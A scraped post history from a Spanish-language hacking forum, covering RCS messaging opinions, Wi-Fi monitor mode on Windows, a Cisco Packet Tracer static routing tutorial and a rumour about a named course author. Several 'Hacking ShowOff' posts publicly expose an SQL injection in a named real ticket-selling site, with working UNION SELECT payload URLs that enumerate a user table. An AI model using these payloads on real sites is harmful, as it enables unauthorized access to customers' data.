El tema del coste económico puede ser un problema, pero imagino que será barato o gratis, para poder competir con las apps del mercado actual (casi todas gratuitas). El gran punto a favor que tiene este sistema es que ya vendrá instalado en nuestros terminales, y esto es lo que le puede hacer triunfar. Google ha sido muy inteligente recurriendo a esta estrategia y puede ser lo que le dé el impulso para situarse en un buen lugar.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#402
Debates, Reviews y Opiniones / Re:¿SMS(RCS) vs redes sociales?
Febrero 28, 2016, 09:20:26 PM
Estoy de acuerdo con @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login. Aunque sea cierto que Google posee gran influencia, creo que no será lo suficiente para quitarle el puesto a Whatsapp u otros. Pienso que tal vez pueda conseguir un buen puesto debido al gran número de personas a las que llegará este servicio, lo quieran o no, impuesto en sus nuevos teléfonos, pero aún así, lo tendrá difícil.
#403
Dudas y pedidos generales / Re:Problema de arranque Kali Linux
Febrero 28, 2016, 07:07:51 PM #404
Redes y antenas / Re:NetLearning: CCNA 640-802 (Español)
Febrero 28, 2016, 04:40:45 PM
Gracias @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login y @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login por los recursos para el curso, y gracias @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login por la info.
Saludos.
Saludos.
#405
Redes y antenas / Re:NetLearning: CCNA 640-802 (Español)
Febrero 27, 2016, 11:12:59 PM
Link caído, ¿podrías resubirlo?
Saludos, y gracias por compartir.
Saludos, y gracias por compartir.
#406
Off Topic / ENCUESTA - ¿A qué edad te iniciaste en la informática?
Febrero 27, 2016, 06:01:38 PM
Me pareció interesante realizar una encuesta de este tipo en el foro, así que aquí se la dejo.
Gracias por participar.
Saludos.
Gracias por participar.
Saludos.
#407
Cursos, manuales y libros / Fundamentos de programación + Ejercicios
Febrero 26, 2016, 10:34:33 AM
#408
Redes y antenas / Comandos para la configuración de Routers y Switchs
Febrero 24, 2016, 09:16:03 AM
#409
Hacking ShowOff / Re:[ SQLi ] www.1000tickets.com.ar
Febrero 22, 2016, 11:48:52 AM #410
Hacking ShowOff / Re:[ SQLi ] www.1000tickets.com.ar
Febrero 22, 2016, 08:03:45 AM #411
Dudas y pedidos generales / Re:Modo monitor en Windows | Drivers
Febrero 21, 2016, 09:49:06 PM
Gracias por tu ayuda @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login, ya he leído ese material pero te respondo, sí, se trata de un reto y de intentar dar una información útil a los futuros usuarios de Internet que estén interesados en el tema, ya que, aunque en Linux se pueda realizar con facilidad, no entiendo por qué si es posible hacerlo en Windows, aunque pueda dar problemas de compatibilidad, no hay casi nada de asesoración e información sobre ello.
#412
Hacking ShowOff / Re:[ SQLi ] www.1000tickets.com.ar
Febrero 21, 2016, 09:01:19 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.Código: text http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
Saludos!, EPSILON
Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, ¿podría recibir ayuda para comunicar la vulnerabilidad?
#413
Hacking ShowOff / [ SQLi ] www.1000tickets.com.ar
Febrero 21, 2016, 01:47:53 PM
****************************************************
SQLi You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
****************************************************
> Site: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
> Descripción del site: venta de entradas para conciertos y demás.
> Descripción de la vulnerabilidad:
-Se encuentra un síntoma de vulnerabilidad frente a SQLi.
-Se halla el tipo de inyección y se comprueba manualmente y mediante SQLHelper
-Tras esto se puede proceder a la búsqueda de información sensible, que puede ser utilizada con fines no éticos.
Tratandose de una página de venta de entradas, la información que contiene esta base de datos puede ser peligrosa si cae en malas manos.
Método manual:
Payload:Código: text
Método automático con SQLHelper:
Vulnerabilidad reportada por la comunidad de Underc0de.
Autor: hati
SQLi You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
****************************************************
> Site: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
> Descripción del site: venta de entradas para conciertos y demás.
> Descripción de la vulnerabilidad:
-Se encuentra un síntoma de vulnerabilidad frente a SQLi.
-Se halla el tipo de inyección y se comprueba manualmente y mediante SQLHelper
-Tras esto se puede proceder a la búsqueda de información sensible, que puede ser utilizada con fines no éticos.
Tratandose de una página de venta de entradas, la información que contiene esta base de datos puede ser peligrosa si cae en malas manos.
Método manual:
Payload:
http://www.1000tickets.com.ar/ficha.php?id=7-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(116,98,108,95,117,115,117,97,114,105,111)--Método automático con SQLHelper:
Vulnerabilidad reportada por la comunidad de Underc0de.
Autor: hati
#414
Dudas y pedidos generales / Re:Modo monitor en Windows | Drivers
Febrero 21, 2016, 12:46:11 PM
Gracias @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login por la respuesta.
Estoy al tanto de que para auditoria de redes es recomendable usar linux, lo que me parece raro es la poca información que hay en la red sobre el modo monitor en Windows, y lo díficil o raro, como tu has mencionado, que es encontrar los drivers para dicho propósito.
Seguiré buscando, y si consigo información útil o drivers que sean compatibles haré un post sobre el tema, ya que pienso que ayudaría a mucha gente. Debido a que el modo monitor es esencial en la auditoria de red, creo que sería conveniente poder utilizarlo también en Windows.
Estoy al tanto de que para auditoria de redes es recomendable usar linux, lo que me parece raro es la poca información que hay en la red sobre el modo monitor en Windows, y lo díficil o raro, como tu has mencionado, que es encontrar los drivers para dicho propósito.
Seguiré buscando, y si consigo información útil o drivers que sean compatibles haré un post sobre el tema, ya que pienso que ayudaría a mucha gente. Debido a que el modo monitor es esencial en la auditoria de red, creo que sería conveniente poder utilizarlo también en Windows.
#415
Dudas y pedidos generales / Modo monitor en Windows | Drivers
Febrero 21, 2016, 10:54:39 AM
Saludos
Llevo unos días buscando información sobre el modo monitor en Windows, se que es posible utilizarlo mediante la instalación de determinados drivers, pero ahí está el problema.
En primer lugar comprobé que mi tarjeta (Atheros AR9485) es compatible con este modo y tras un poco de búsqueda encontré que sí.
Después de mucho googlear y buscar por la red, la información útil que obtuve no fue mucha.
Leí que con el software de seguridad wireless CommView se incluía un driver apto para esto. Lo probé y nada.
Encontré algo similar pero con el programa Acrylic Wifi Proffsional, también lo probé y nada.
La página que más útil me resulto fue You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login donde puedes encontrar varios tutoriales de como instalar los drivers y más relacionado con el tema.
¿Alguien sabe donde podría buscar o encontrar los dirvers?
Gracias de antemano.
Llevo unos días buscando información sobre el modo monitor en Windows, se que es posible utilizarlo mediante la instalación de determinados drivers, pero ahí está el problema.
En primer lugar comprobé que mi tarjeta (Atheros AR9485) es compatible con este modo y tras un poco de búsqueda encontré que sí.
Después de mucho googlear y buscar por la red, la información útil que obtuve no fue mucha.
Leí que con el software de seguridad wireless CommView se incluía un driver apto para esto. Lo probé y nada.
Encontré algo similar pero con el programa Acrylic Wifi Proffsional, también lo probé y nada.
La página que más útil me resulto fue You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login donde puedes encontrar varios tutoriales de como instalar los drivers y más relacionado con el tema.
¿Alguien sabe donde podría buscar o encontrar los dirvers?
Gracias de antemano.
#416
Dudas y pedidos generales / Re:SMS Spoofing
Febrero 20, 2016, 06:20:10 PM #417
Redes y antenas / Re:Enrutamiento estático con Cisco Packet Tracer.
Febrero 19, 2016, 07:36:07 PM
Gracias @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login y @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login por la información, he modificado el post intentando mejorarlo con vuestros consejos. Tiene sentido lo de las rutas quadzero, y lo de la máscara era un claro desperdicio.
#418
Redes y antenas / Enrutamiento estático con Cisco Packet Tracer.
Febrero 19, 2016, 12:04:56 PM
¿Qué es Cisco Packet Tracer?
"Es un programa de simulación de redes que permite a los estudiantes experimentar con el comportamiento de la red. Como parte integral de la Academia de Networking de Cisco, Packet Tracer provee capacidades de simulación, visualización, evaluación y colaboración y facilita la enseñanza y aprendizaje de conceptos básicos de redes."
Wikipedia:
En la página Networking Academy de Cisco (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) encontrarás documentación, cursos, certificaciones...
¿Qué es el enrutamiento?
Es la función de buscar el mejor camino entre todos los posibles en una red de paquetes, es decir, encontrar las rutas más óptimas para dirigir dichos paquetes.
En consecuencia, corresponde señalar que entendemos por "mejor ruta"; es decir, aquella que pasa por el menor número de nodos, mantiene una buena frecuencia y ofrece el menor coste.
CONFIGURACIÓN DE DISPOSITIVOS
Para demostrar como hacer un enrutamiento básico con su correspondiente configuración, dispondremos el siguiente escenario:
Como vemos, cada ordenador está conectado a un swicht de 24 bocas FastEthernet, y este a su vez está conectado a un router 2621xm de Cisco.
Cada router cuenta con dos interfaces FastEthernet y el router del centro de la imagen cuenta además con una interfaz de red adicional FastEthernet 1/0.
Si nunca has usado Cisco Packet Tracer te darás cuenta de que es muy intuitivo y fácil de usar, hasta el momento lo único que hemos tenido que hacer es arrastrar los elementos a la pantalla.
Ahora configuraremos las IP de cada uno de los ordenadores. Para ello hacemos clic en el icono del ordenador, vamos al apartado "Desktop" y nos dirigimos a "IP Configuration", donde nos aparecerá el menú de configuración de IP. Realizaremos este paso con todos los ordenadores.
El siguiente paso es la configuración de los routers y sus correspondientes direcciones IP. Para ello hacemos clic en el icono del primer router (izquierda) y nos dirigimos al apartado CLI, que se trata una emulación de la Interfaz de Línea de Comandos de un router CISCO, y allí ejecutamos los siguientes comandos:
Primera interfaz:
enable /Entrar en modo privilegiado
(#) configure terminal /Entrar en modo de configuración global
(config) interface fastethernet 0/0 /Seleccionar interfaz a configurar
(config-if) ip address 192.168.1.1 255.255.255.0 /Añadir IP y máscara
(config-if) no shutdown /No apagar
(config-if) exit /Salir
Segunda interfaz:
(#) configure terminal
(config) interface fastethernet 0/1
(config-if) ip address 10.10.1.1 255.255.255.252
(config-if) no shutdown
(config-if) exit
Ahora configuraremos el router central, que cuenta con tres interfaces. Para ello seguiremos el mismo procedimiento de configuración:
Primera interfaz:
enable
(#) configure terminal
(config) interface fastethernet 0/0
(config-if) ip address 192.168.2.1 255.255.255.0
(config-if) no shutdown
(config-if) exit
Segunda interfaz:
(#) configure terminal
(config) interface fastethernet 0/1
(config-if) ip address 10.10.1.2 255.255.255.252
(config-if) no shutdown
(config-if) exit
Tercera interfaz:
(#) configure terminal
(config) interface fastethernet 1/0
(config-if) ip address 10.10.2.2 255.255.255.252
(config-if) no shutdown
(config-if) exit
Solo falta configurar el router de la derecha, de la misma forma que los anteriores:
Primera interfaz:
enable
(#) configure terminal
(config) interface fastethernet 0/0
(config-if) ip address 192.168.3.1 255.255.255.0
(config-if) no shutdown
(config-if) exit
Segunda interfaz:
(#) configure terminal
(config) interface fastethernet 0/1
(config-if) ip address 10.10.2.1 255.255.255.252
(config-if) no shutdown
(config-if) exit
Ya están configurados todos los routers y los ordenadores. Ahora procedemos a realizar el enrutamiento de todas las redes de nuestro escenario, que actualmente sería este:
ENRUTAMIENTO
El primer router que configuraremos será el router de la izquierda. Clic sobre él y nos dirigimos a la pestaña CLI para ejecutar los siguientes comandos:
enable
(#) configure terminal
(config) ip route 192.168.0.0 255.255.0.0 10.10.1.2
Con el comando ip route conseguimos dirigir los "saltos".
El siguiente router que configuraremos será el de la derecha, de la misma manera que en el caso anterior:
enable
(#) configure terminal
(config)ip route 192.168.0.0 255.255.0.0 10.10.2.1
Solo queda por configurar el router del centro, en este caso tenemos que introducir las rutas fijas 192.168.1.0/24 y 192.168.3.0/24. Lo haremos de la siguiente forma:
enable
(#) configure terminal
(config) ip route 192.168.1.0 255.255.255.0 10.10.1.1
(config) ip route 192.168.3.0 255.255.255.0 10.10.2.2
Con esto, el enrutamiento estaría realizado.
Para comprobarlo haremos ping desde un pc, a otro que no esté en su misma red. Para hacer ping, clic a un pc, ir a desktop, y Command Promt.
Desde 192.168.1.2 > ping 192.168.2.1
Desde 192.168.1.2 > ping 192.168.3.1
Tras realizar el enrutamiento, deberemos guardar la configuración, para que cuando se reinicie el router no la perdamos. Esto se hace desde CLI en cada router:
enable
(#) copy running-config startup-config
Ya tendríamos la red preparada para funcionar, con su respectiva configuración y enrutamiento. Hay otros comandos que es interesante conocer:
Para ver la configuración de cada ruter:
enable
(#) show running-config
Para cambiar la contraseña de configuración del router:
enable
(#) configure terminal
(config) enable password 12345
Para cambiar el nombre de un dispositivo Cisco:
enable
(#) configure terminal
(config) hostname nombre
"Es un programa de simulación de redes que permite a los estudiantes experimentar con el comportamiento de la red. Como parte integral de la Academia de Networking de Cisco, Packet Tracer provee capacidades de simulación, visualización, evaluación y colaboración y facilita la enseñanza y aprendizaje de conceptos básicos de redes."
Wikipedia:
En la página Networking Academy de Cisco (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) encontrarás documentación, cursos, certificaciones...
¿Qué es el enrutamiento?
Es la función de buscar el mejor camino entre todos los posibles en una red de paquetes, es decir, encontrar las rutas más óptimas para dirigir dichos paquetes.
En consecuencia, corresponde señalar que entendemos por "mejor ruta"; es decir, aquella que pasa por el menor número de nodos, mantiene una buena frecuencia y ofrece el menor coste.
CONFIGURACIÓN DE DISPOSITIVOS
Para demostrar como hacer un enrutamiento básico con su correspondiente configuración, dispondremos el siguiente escenario:
Como vemos, cada ordenador está conectado a un swicht de 24 bocas FastEthernet, y este a su vez está conectado a un router 2621xm de Cisco.
Cada router cuenta con dos interfaces FastEthernet y el router del centro de la imagen cuenta además con una interfaz de red adicional FastEthernet 1/0.
Si nunca has usado Cisco Packet Tracer te darás cuenta de que es muy intuitivo y fácil de usar, hasta el momento lo único que hemos tenido que hacer es arrastrar los elementos a la pantalla.
Ahora configuraremos las IP de cada uno de los ordenadores. Para ello hacemos clic en el icono del ordenador, vamos al apartado "Desktop" y nos dirigimos a "IP Configuration", donde nos aparecerá el menú de configuración de IP. Realizaremos este paso con todos los ordenadores.
El siguiente paso es la configuración de los routers y sus correspondientes direcciones IP. Para ello hacemos clic en el icono del primer router (izquierda) y nos dirigimos al apartado CLI, que se trata una emulación de la Interfaz de Línea de Comandos de un router CISCO, y allí ejecutamos los siguientes comandos:
Primera interfaz:
enable /Entrar en modo privilegiado
(#) configure terminal /Entrar en modo de configuración global
(config) interface fastethernet 0/0 /Seleccionar interfaz a configurar
(config-if) ip address 192.168.1.1 255.255.255.0 /Añadir IP y máscara
(config-if) no shutdown /No apagar
(config-if) exit /Salir
Segunda interfaz:
(#) configure terminal
(config) interface fastethernet 0/1
(config-if) ip address 10.10.1.1 255.255.255.252
(config-if) no shutdown
(config-if) exit
Ahora configuraremos el router central, que cuenta con tres interfaces. Para ello seguiremos el mismo procedimiento de configuración:
Primera interfaz:
enable
(#) configure terminal
(config) interface fastethernet 0/0
(config-if) ip address 192.168.2.1 255.255.255.0
(config-if) no shutdown
(config-if) exit
Segunda interfaz:
(#) configure terminal
(config) interface fastethernet 0/1
(config-if) ip address 10.10.1.2 255.255.255.252
(config-if) no shutdown
(config-if) exit
Tercera interfaz:
(#) configure terminal
(config) interface fastethernet 1/0
(config-if) ip address 10.10.2.2 255.255.255.252
(config-if) no shutdown
(config-if) exit
Solo falta configurar el router de la derecha, de la misma forma que los anteriores:
Primera interfaz:
enable
(#) configure terminal
(config) interface fastethernet 0/0
(config-if) ip address 192.168.3.1 255.255.255.0
(config-if) no shutdown
(config-if) exit
Segunda interfaz:
(#) configure terminal
(config) interface fastethernet 0/1
(config-if) ip address 10.10.2.1 255.255.255.252
(config-if) no shutdown
(config-if) exit
Ya están configurados todos los routers y los ordenadores. Ahora procedemos a realizar el enrutamiento de todas las redes de nuestro escenario, que actualmente sería este:
ENRUTAMIENTO
El primer router que configuraremos será el router de la izquierda. Clic sobre él y nos dirigimos a la pestaña CLI para ejecutar los siguientes comandos:
enable
(#) configure terminal
(config) ip route 192.168.0.0 255.255.0.0 10.10.1.2
Con el comando ip route conseguimos dirigir los "saltos".
El siguiente router que configuraremos será el de la derecha, de la misma manera que en el caso anterior:
enable
(#) configure terminal
(config)ip route 192.168.0.0 255.255.0.0 10.10.2.1
Solo queda por configurar el router del centro, en este caso tenemos que introducir las rutas fijas 192.168.1.0/24 y 192.168.3.0/24. Lo haremos de la siguiente forma:
enable
(#) configure terminal
(config) ip route 192.168.1.0 255.255.255.0 10.10.1.1
(config) ip route 192.168.3.0 255.255.255.0 10.10.2.2
Con esto, el enrutamiento estaría realizado.
Para comprobarlo haremos ping desde un pc, a otro que no esté en su misma red. Para hacer ping, clic a un pc, ir a desktop, y Command Promt.
Desde 192.168.1.2 > ping 192.168.2.1
Desde 192.168.1.2 > ping 192.168.3.1
Tras realizar el enrutamiento, deberemos guardar la configuración, para que cuando se reinicie el router no la perdamos. Esto se hace desde CLI en cada router:
enable
(#) copy running-config startup-config
Ya tendríamos la red preparada para funcionar, con su respectiva configuración y enrutamiento. Hay otros comandos que es interesante conocer:
Para ver la configuración de cada ruter:
enable
(#) show running-config
Para cambiar la contraseña de configuración del router:
enable
(#) configure terminal
(config) enable password 12345
Para cambiar el nombre de un dispositivo Cisco:
enable
(#) configure terminal
(config) hostname nombre
#419
Hacking / Re:[DESCARGA] Certificación de Seguridad Ofensiva – HackingMéxico
Febrero 11, 2016, 11:58:25 AM
En primer lugar, gracias por tu intención de compartir conocimiento.
No he descargado el material, pero he buscado información sobre Hackinmexico y la Certificación de Seguridad Ofensiva y he encontrado que dicha certificación no tiene la validez que dice tener, también he encontrado información sobre el autor del material, Raúl Robles Avilés o Megabyte, y pocas cosas buenas se dicen de él y del curso.
Incluso se dice que recientemente ha sido asesinado por un usuario de Hispachan, rumores...
De todas formas descargaré el material y le echaré un vistazo.
Gracias de nuevo por todos tus post, pienso que compartes material de gran calidad para que todos aprendan.
No he descargado el material, pero he buscado información sobre Hackinmexico y la Certificación de Seguridad Ofensiva y he encontrado que dicha certificación no tiene la validez que dice tener, también he encontrado información sobre el autor del material, Raúl Robles Avilés o Megabyte, y pocas cosas buenas se dicen de él y del curso.
Incluso se dice que recientemente ha sido asesinado por un usuario de Hispachan, rumores...
De todas formas descargaré el material y le echaré un vistazo.
Gracias de nuevo por todos tus post, pienso que compartes material de gran calidad para que todos aprendan.
#420
Hacking / Re:Offensive security penetration testing whit kali linux (Traducción al español)
Febrero 09, 2016, 01:12:00 PM
Muchas gracias por compartir tu tiempo y conocimiento!! Un gran trabajo
